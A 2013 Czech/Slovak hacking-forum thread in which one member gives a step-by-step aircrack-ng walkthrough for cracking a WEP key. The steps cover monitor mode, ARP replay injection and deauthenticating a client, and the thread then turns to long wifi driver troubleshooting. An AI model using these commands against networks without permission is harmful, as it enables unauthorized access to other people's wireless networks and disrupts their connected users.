BackTrack R3 GNOME prolomení WEP návod na VMWare

Wi-Fi hacking, techniky a aplikace na prolomení zabezpečení bezdrátových sítí. Pentes, hacking Wi-Fi zranitelností, hack firmware, Hacking WLAN
Uživatelský avatar
zdenda204
Level 0
Příspěvky: 16
Registrován: 18 úno 2013, 20:09

18 úno 2013, 20:19

Ahoj, stahuji operační systém BackTrack R3 GNOME a potřeboval bych stručný, ale přesný návod jak prolomit WEP heslo.
Hledat jsem na YT, zde, ale všude je strašně moc věcí navíc a mě z toho pak jde hlava kolem :)

PS: Našel jsem tu i článek, že by tu mělo být video, ale nepodařilo se mi ho najít, takže bych ocenil klidně český video který popisuje jak to prolomit ;)
Notebook: Lenovo ThinkPad Edge E530
Síťová karta: Intel(R) Centrino(R) Wireless-N 2230
Systém: Windows 8

Uživatelský avatar
animal
Level 4
Příspěvky: 97
Registrován: 28 led 2012, 21:14
Bydliště: Trenčín

18 úno 2013, 22:53

čiže najskôr zisti interface name
príkaz:
airmon-ng
vypíše:

Kód: Vybrat vše

 Interface       Chipset         Driver

wifi0           Atheros          ath5k
ath0            Atheros          ath5k 
Poznamka :nemusí tam byť na konci wifi0 ty môžeš mat ine napríklad vlan0 a tak ďalej

daľej spusti monitor mode
sudo airmon-ng start wifi0

Kód: Vybrat vše

 Interface       Chipset         Driver

wifi0           Atheros          ath5k
ath0            Atheros          ath5k (parent: wifi0) (monitor mode enabled on mon0)
monitor mode máš už spustený na interface mon0 možno u teba sa to bude volať inak
spustíme airodump-ng
airodump-ng mon0
vypíše ti ty zoznam najdených sieti
potom si vybereš siet ktoru chceš testovať a dáš tento príkaz
sudo airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output mon0
poznamka
-c = čislo kanalu na danej siete ktoru chceš testovať
-bssid 00:14:6C:7E:40:80 (tam daš mac adresu danej siete )
-w output(nazov suboru nemusi byt output možeš si dať akýkoľvek -w ty vlastne vytvori súbor kde sa ti kukladajú zachytene datá)

Kód: Vybrat vše

CH  9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25
                                                                                                             
BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
                                                                                                           
00:14:6C:7E:40:80   42 100     5240   178307  338   9  54  WEP  WEP         teddy                           
                                                                                                           
BSSID              STATION            PWR  Lost  Packets  Probes                                             
                                                                                                           
00:14:6C:7E:40:80  00:0F:B5:88:AC:82   42     0   183782 
poznamka dole máš:
bssid: 00:14:6C:7E:40:80 mc adresa router
station mac adresa klienta ktorý je pripojený na danej sieti
ďalej otvor nove okno
aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 mon0
poznamka:
-3 znamená zachytávanie ARP packetov a packet injection
-b 00:14:6C:7E:40:80 je MAC adresa AP
-h 00:0F:B5:88:AC:82 je MAC adresa nejakého clienta
zobrazi niečo takéto:

Kód: Vybrat vše

Read 629399 packets (got 0 ARP requests), sent 0 packets...
ďalej otvor ďalšie terminálové okno
aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:88:AC:82 mon0

poznamka
týmto deautentifikuješ clienta on sa automaticky pripojí a ty tím získaš ARP packet potrebný pre packet injection
ak nezachitíš ARP packet počkaj cca 1 min a zopakuj (ARP packet by si mal zachytiť ) osobne ja som tento príkaz pri kodovani wep ešte nepotreboval
otvor ďalšie okno a už len pusti aircrack
sudo aircrack-ng cesta k súboru output-01.cap
poznamka večšinou sa to uklada do domovského priečinku takže cestu zadávať nemusíš
stači dať
sudo aircrack-ng output-01.cap
čislo ak sa tam nachadza viac suborov output-xx.cap tak tak čislo môže byť iné napr 02 a tak ďalej
k tomuto útoku je potrebne nazbierať 15000-25000 dát niekedy viac niekedy menej
potrebuješ mat klienta pripojeného na sieti respektíve nepotrebuješ ale je to lepšie ak je pripojení rýchlejšie
a ešte by som ti odporúčal si stiahnuť BackTrack R3 GNOME normálne iso subor a vypáliť si to na dvd alebo usb a bootovať to z usb alebo dvd a nepouživať vmware keďže zrejeme ta wifi je budovaná v notebooku a vo vmware ti ju asi nenačíta

Uživatelský avatar
zdenda204
Level 0
Příspěvky: 16
Registrován: 18 úno 2013, 20:09

19 úno 2013, 08:19

Hned potom jsem stáhl jsem stáhl ten GNOME a mám ho na USB :) Ale jakým příkazem se dostanu do toho vizuálního prostředí? A ještě k té síťové kartě, potřeboval bych asi nainstalovat drivery, protože se seknu hned na tom prvním příkazu když mi nevypíše žádný iterface, driver ani chipset ://

Uživatelský avatar
menom
Level 6
Příspěvky: 170
Registrován: 29 zář 2011, 00:37

19 úno 2013, 11:18

BackTrack spustíš v grafickom režime, keď napíšeš do termnálu príkaz:
startx
a stlačíš ENTER.

A potom v termináli, skús ten príkaz:
airmon-ng
Keď tam nebude info - (interface, chipset, driver) tak daj príkaz :
lspci -v
A okopíruj sem ten odstavec, kde sa píše o wireless, býva to naspodu druhá časť od konca.

Uživatelský avatar
wire
Level 8
Příspěvky: 696
Registrován: 15 kvě 2007, 22:44
Bydliště: Praha

19 úno 2013, 11:18

zdenda204 ptáš se jak nabootuješ operační systém nebo jak se dostaneš do GNOME?? :D
Ve Fóru používáme diakritiku, než se ptáme čteme nápovědu a pravidla fóra!

Uživatelský avatar
zdenda204
Level 0
Příspěvky: 16
Registrován: 18 úno 2013, 20:09

19 úno 2013, 12:13

Bootovat není problém, docela hodně se vyznám v IT :P Ale nedařilo se mi dostat do grafického rozhraní.

Uživatelský avatar
wire
Level 8
Příspěvky: 696
Registrován: 15 kvě 2007, 22:44
Bydliště: Praha

19 úno 2013, 13:44

Prima IT.. pak ješte necitovat poslední post (k čemu?) a bude to príma :D
Ve Fóru používáme diakritiku, než se ptáme čteme nápovědu a pravidla fóra!

Uživatelský avatar
zdenda204
Level 0
Příspěvky: 16
Registrován: 18 úno 2013, 20:09

19 úno 2013, 14:23

Promiň, je to zvyk z jiných fór :)
Snad je toto správný text:

Kód: Vybrat vše

03:00.0 Network controller: Intel Corporation Device 0888 (rev c4)
        Subsystem: Intel Corporation Device 4262
        Flags: fast devsel, IRQ 17
        Memory at f2d00000 (64-bit, non-prefetchable) [size=8K]
        Capabilities: [c8] Power Management version 3
        Capabilities: [d0] Message Signalled Interrupts: Mask- 64bit+ Queue=0/0 Enable-
        Capabilities: [e0] Express Endpoint, MSI 00
        Capabilities: [100] Advanced Error Reporting <?>
        Capabilities: [140] Device Serial Number d9-66-7e-ff-ff-c8-a6-84
        Kernel modules: iwlwifi

0c:00.0 Ethernet controller: Realtek Semiconductor Co., Ltd. RTL8111/8168B PCI Express Gigabit Ethernet controller (rev 07)
        Subsystem: Lenovo Device 5000
        Flags: bus master, fast devsel, latency 0, IRQ 42
        I/O ports at 2000 [size=256]
        Memory at f1404000 (64-bit, prefetchable) [size=4K]
        Memory at f1400000 (64-bit, prefetchable) [size=16K]
        Capabilities: [40] Power Management version 3
        Capabilities: [50] Message Signalled Interrupts: Mask- 64bit+ Queue=0/0 Enable+
        Capabilities: [70] Express Endpoint, MSI 01
        Capabilities: [b0] MSI-X: Enable- Mask- TabSize=4
        Capabilities: [d0] Vital Product Data <?>
        Capabilities: [100] Advanced Error Reporting <?>
        Capabilities: [140] Virtual Channel <?>
        Capabilities: [160] Device Serial Number 00-e0-4c-68-00-00-52-09
        Kernel driver in use: r8169
        Kernel modules: r8169
 

Uživatelský avatar
menom
Level 6
Příspěvky: 170
Registrován: 29 zář 2011, 00:37

19 úno 2013, 17:27

Mohol by si pozrieť sem :

Kód: Vybrat vše

http://wireless.kernel.org/en/users/Drivers/iwlwifi
Tvoja wifi je v zozname na poslednom mieste a stiahnuť, rozbaliť a nainštalovať ten firmware:
iwlwifi-2030-ucode-18.168.6.1.tgz

Trocha si to preštuduj.

Uživatelský avatar
zdenda204
Level 0
Příspěvky: 16
Registrován: 18 úno 2013, 20:09

19 úno 2013, 19:26

Díky, našel jsem to už ve škole :)
Ale moc si nejsem jistej postupem instalace.
Je to takto?

Kód: Vybrat vše

# cp iwlwifi-*.ucode /lib/firmware

1. copy the "iwlwifi-*.ucode" file to /lib/firmware/ ?
2. then i should run "modprode -r iwlagn"
3. then i should run "modprobe iwlagn"
A ta hvězdička bude to číslo v názvu souboru.

Uživatelský avatar
zdenda204
Level 0
Příspěvky: 16
Registrován: 18 úno 2013, 20:09

19 úno 2013, 20:08

Tak stále nefunguje :// Stáhl jsem si z
http://wireless.kernel.org/en/users/Drivers/iwlwifi

Jak jsem postupoval:
1) Na plochu jsem si z flashky dal soubor "iwlwifi-2030-6.ucode" který byl v zazipované složce

2) Otevřel jsem konzoli a zadal první příkaz "cp /root/home/iwlwifi-2030-6.ucode" a vše se správně překopírovalo (kontroloval jsem i v Delphinu)

3) Pak zadal příkazy "modprobe iwlagn" a "modprobe -r iwlagn" (také proběhlo v konzoli bez chyb, respektive to nic nenapsalo a měl jsem možnost zadávat dál :) )

4) Zkusil jsem příkaz "airmon-ng", ale zase to nic nevypsalo (interface, driver,...)

Už mě fakt nic nenapadá.

Uživatelský avatar
menom
Level 6
Příspěvky: 170
Registrován: 29 zář 2011, 00:37

19 úno 2013, 23:51

2) Otevřel jsem konzoli a zadal první příkaz "cp /root/home/iwlwifi-2030-6.ucode" a vše se správně překopírovalo (kontroloval jsem i v Delphinu)
Takže súbor "iwlwifi-2030-6.ucode" máš v /lib/firmware ? Skús sem okopírovať znova výstup z príkazu lspci -v ak sa tam niečo zmenilo (o wireless).Tie príkazy by som skúsil:

Odstrániť modul:
rmmod iwlwifi
Načítať modul:
modprobe iwlwifi
Ak toto nepomohlo, tak podrobné info máš vo výpise:
dmesg
Tento by si mohol kopírovať na www.pastebin.com a dať sem odkaz.

Uživatelský avatar
wire
Level 8
Příspěvky: 696
Registrován: 15 kvě 2007, 22:44
Bydliště: Praha

20 úno 2013, 10:10

* v příkazu značí wildcard t.z že to nainstaluje/nakopíruje soubor s libovolným znakem mezi iwlwifi- a .ucode :D
Ve Fóru používáme diakritiku, než se ptáme čteme nápovědu a pravidla fóra!

Uživatelský avatar
zdenda204
Level 0
Příspěvky: 16
Registrován: 18 úno 2013, 20:09

20 úno 2013, 12:25

Nemůže být problém v tom, že všechny změny co provedu se po rebootu smažou ?
Jak to popřípadě nastavit aby mi to na té flashce zůstávalo?
Teď jdu sehnat ten novej výpis z "lspci -v" a pak zkusit to odstranění modulu ;)

Uživatelský avatar
zdenda204
Level 0
Příspěvky: 16
Registrován: 18 úno 2013, 20:09

20 úno 2013, 12:59

Tak tady to je :)
DMESG: http://pastebin.com/uwvwwtTy
LSPCI: http://pastebin.com/WTMDtAvX

PS: Za ten spam asi můžu já, protože když jsem tvořil to LiveUSB, tak jsem zkoušel nastavit na 9GB možnost "Space used to preserve files across reboots"

Uživatelský avatar
menom
Level 6
Příspěvky: 170
Registrován: 29 zář 2011, 00:37

20 úno 2013, 13:10

Áno to je podstatná vec, aby sa zachovali zmeny.
Ak to máš na usb key ako LiveCD tak zmeny po reboote zmiznú.

Záleží od programu akým si to dal na usb flashku, či tam podporuje takzvaný Persistent mode.

Uživatelský avatar
menom
Level 6
Příspěvky: 170
Registrován: 29 zář 2011, 00:37

20 úno 2013, 13:35

Asi by si mal najskôr spraviť usb key (flashku) tak aby sa ti zachovali zmeny.
A skúsiť znova ten postup.
Vo výpise lspci -v vidím pokrok, takto to potrebuješ mať aby tam bolo vidno tieto dva podstatné riadky:
Kernel driver in use: iwlwifi
Kernel modules: iwlwifi
To je správne.

Uživatelský avatar
zdenda204
Level 0
Příspěvky: 16
Registrován: 18 úno 2013, 20:09

20 úno 2013, 14:28

Tak už dělám novou verzi s Persistent modem přes program Universal USB Installer 1.9.2.5.
Tak pokrok by byl, ale co mám udělat dále abych to zprovoznil?

Uživatelský avatar
menom
Level 6
Příspěvky: 170
Registrován: 29 zář 2011, 00:37

20 úno 2013, 15:18

No zopakovať celý postup.Išlo ti to dobre.
Do /lib/firmware potrebuješ dostať ten súbor iwlwifi-2030-6.ucode.
Potom skús znova tie príkazy na odstránenie a zavedenie modulu.

Pokojne aj tie prvé príkazy pre iwlagn, hoci neviem ako ten iwlagn súvisí s iwlwifi.
Vo výpise lspci -v si môžeš hocikedy skontrolovať Kernel modul a Kernel driver in use.

Teda či sa ti podarí nakoniec aj zachytávať dáta v Monitor mode neviem, ale pokiaľ tam bude modul a ovládač, tak by sa mala wifi rozbehnúť.
Či je wifi pripravená v Managed mode pozrieš príkazom iwconfig alebo skúsiš sa pripojiť cez wicd.

Uživatelský avatar
zdenda204
Level 0
Příspěvky: 16
Registrován: 18 úno 2013, 20:09

20 úno 2013, 15:51

Tak pokus nevyšel. Z USB to ani nenabootuje :/ Jdu to zkusit znovu s UNetBootin, kde zkusím nastavit 2GB pro ty soubory.

Uživatelský avatar
zdenda204
Level 0
Příspěvky: 16
Registrován: 18 úno 2013, 20:09

20 úno 2013, 17:52

Tak to je blbý :// Když to spustím s tím Persistem mode, tak ten systém naprosto šíleně laguje (vypadá to, že i všechny grafické úkony vykonává procesor místo grafiky).

Když jsem tedy zopakoval celý postup a zadal příkaz airmon-ng, tak se akorát vypíše ten první řádek (Interface, driver,...), ale dále už je procesor zatížen na 75%-80% a nic se neděje.

Napadlo mě to nainstalovat na pevný disk, ale nechci si tím zasvinit HDD, takže nějaké nápady ?

Uživatelský avatar
menom
Level 6
Příspěvky: 170
Registrován: 29 zář 2011, 00:37

20 úno 2013, 21:48

Asi najľahšie by bolo zohnať wifi kartu ktorá je bezproblémová pre Linux.
Alebo USB key 3.0 alebo dať Backtrack Linux na externý harddisk..

Uživatelský avatar
zdenda204
Level 0
Příspěvky: 16
Registrován: 18 úno 2013, 20:09

20 bře 2013, 18:06

Tak jsem si BackTrack nainstaloval na HDD jako sekundární systém a je to celkem bezva :)
Podařilo se mi i částečně zprovoznit Wifi kartu, takže můžu procházet web.
Mám tam ten driver iwlwifi, ale prostě když chci použít příkaz airmon-ng, tak to vypíše jen hlavičku (Interface, Driver,...) a pak se to jakoby sekne a jediné co můžu udělat je vypnout konzoli :/
Nějaké nápady?

Uživatelský avatar
menom
Level 6
Příspěvky: 170
Registrován: 29 zář 2011, 00:37

20 bře 2013, 22:38

Skús čo vypíše príkaz:
iwconfig
Vľavo by malo byť označenie interface (napríklad wlan0 ...)

Potom by si mohol vypnúť wifi (miesto wlan0 daj tvoj názov interface):
ifconfig wlan0 down
Zapni monitor mode (miesto wlan0 daj tvoj názov interface):
airmon-ng start wlan0

Uživatelský avatar
zdenda204
Level 0
Příspěvky: 16
Registrován: 18 úno 2013, 20:09

21 bře 2013, 14:38

Tak zde je obsah konsole ;) http://pastebin.com/1mBwQ9Jv
Zase jsem se sekl na tom stejném místě, kdy čekám až se mi vypíše Interface, Chipset a Driver :/

Uživatelský avatar
menom
Level 6
Příspěvky: 170
Registrován: 29 zář 2011, 00:37

21 bře 2013, 16:33

Treba zabiť tie procesy dhclient cez príkaz kill -9 PID:
Namiesto PID píš čísla procesov oddelených medzerou.
kill -9 1487 1555 1664
Ak to ide, zopakuj príkaz :
airmon-ng start wlan0
Ak sa to seklo, zamrzlo (kouslo), tak nedaj ten príkaz na prepnutie wlan0 do Monitor mode,
ale daj:
top
A kedˇ uvidíš vpravo jeden alebo viac procesov dhclient stlač spou ctrl+c (zastavíš bežiaci program) a použi príkaz
kill -9 PID
Po zrušení tých dhclient skús znova:
airmon-ng start wlan0

Uživatelský avatar
zdenda204
Level 0
Příspěvky: 16
Registrován: 18 úno 2013, 20:09

21 bře 2013, 17:46

Tak jsem vypnul wifi, pak jí zapnul v tom monitoring módu a vyzabíjel všechny dhclient.
Pak jsem znovu zkusil zapnout ten monitoring mód, ale zůstal mi tam dhclient s PID 14320 :/
Pokaždé když ho zabiju, tak se tam vrátí.
Tak jsem zkusil ten příkat top, ale tam žádní dhclienti nebyli.
Takže už opravdu nevím :(

Uživatelský avatar
menom
Level 6
Příspěvky: 170
Registrován: 29 zář 2011, 00:37

22 bře 2013, 00:22

Ak si mal pustený wicd - nemáš minimalizované okno tohto programu ?
Alebo niekedy sa stane že proces zblbne a nedá sa vypnúť.
V termináli s pusteným programom „top“ to nájdeš tak, že vedľa „zombie“ bude 1 možno aj viac.

Potom treba len reboot a nepúštaj wicd.
A znova skús zopakovať tie príkazy.

Uživatelský avatar
zdenda204
Level 0
Příspěvky: 16
Registrován: 18 úno 2013, 20:09

22 bře 2013, 13:24

Nebyla by možnost to vyřešit přes TeamViewer nebo něco podobného?

Uživatelský avatar
zdenda204
Level 0
Příspěvky: 16
Registrován: 18 úno 2013, 20:09

22 bře 2013, 13:51

Škoda že mám double posty, ale tak co se dá dělat :) Zkusil jsem to znovu bez toho Wicd, ale stále mrznu na stejném místě :/
Přikládám obrázek s postupem.
Přílohy
wicd-bt3.png
wicd-bt3.png (250.57 KiB) Zobrazeno 512 x

Odpovědět
  • Informace
  • Kdo je online

    Uživatelé prohlížející si toto fórum: Žádní registrovaní uživatelé a 1 host